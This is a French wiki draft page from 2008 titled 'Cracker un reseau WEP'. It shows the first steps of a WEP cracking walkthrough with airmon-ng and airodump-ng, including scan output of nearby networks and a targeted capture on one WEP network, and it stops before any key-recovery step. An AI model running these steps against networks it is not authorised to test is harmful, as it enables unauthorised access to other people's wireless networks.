Outils pour utilisateurs

Outils du site


brouillon_wep

Ceci est une ancienne révision du document !


Cracker un reseau WEP

Interface Wifi

Voir les interfaces Wifi disponible:

# airmon-ng
Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)

Demarrer le monitor sur l'interface wifi0

# airmon-ng start wifi0
Interface       Chipset         Driver

wifi0           Atheros         madwifi-ngError for wireless request "Set Frequency" (8B04) :
    SET failed on device ath1 ; No such device.
ath1: ERROR while getting interface flags: No such device

ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath2            Atheros         madwifi-ng VAP (parent: wifi0)

Oups: c'est quoi cette erreur ?

Capter les reseaux…

# airodump-ng --write fichier ath2
CH 12 ][ Elapsed: 7 mins ][ 2008-04-20 00:36

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 
16:78:DF:XX:XX:7E   38      808        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
16:78:DF:XX:XX:7D   36      800        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
16:78:DF:XX:XX:7C   35      792        1    0  13  54  WEP  WEP         K6WIFI
16:78:DF:XX:XX:7F   36      797        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
6E:6A:97:ZZ:ZZ:8D   26      848        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
6E:6A:97:ZZ:ZZ:8C   26      805        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
6E:6A:97:ZZ:ZZ:8F   28      811        0    0  13  54  WPA  TKIP   MGT  freephonie
6E:6A:97:ZZ:ZZ:8E   28      832        0    0  13  54  WPA2 CCMP   PSK  <length:  0>

BSSID              STATION            PWR  Lost  Packets  Probes

(not associated)   00:03:9D:XX:XX:XX   37    31      784  K6WIFI
(not associated)   00:15:AF:XX:XX:XX    0     0       36

On s'interesse au reseau “WEP” et/ou dont la colonne #Data est non nulle.

On affine l'ecoute sur le reseau faible:

# airodump-ng --write test2 --channel 13 --bssid 16:78:DF:XX:XX:7C ath2
brouillon_wep.1208645203.txt.gz · Dernière modification : 2008/04/19 22:46 de thierry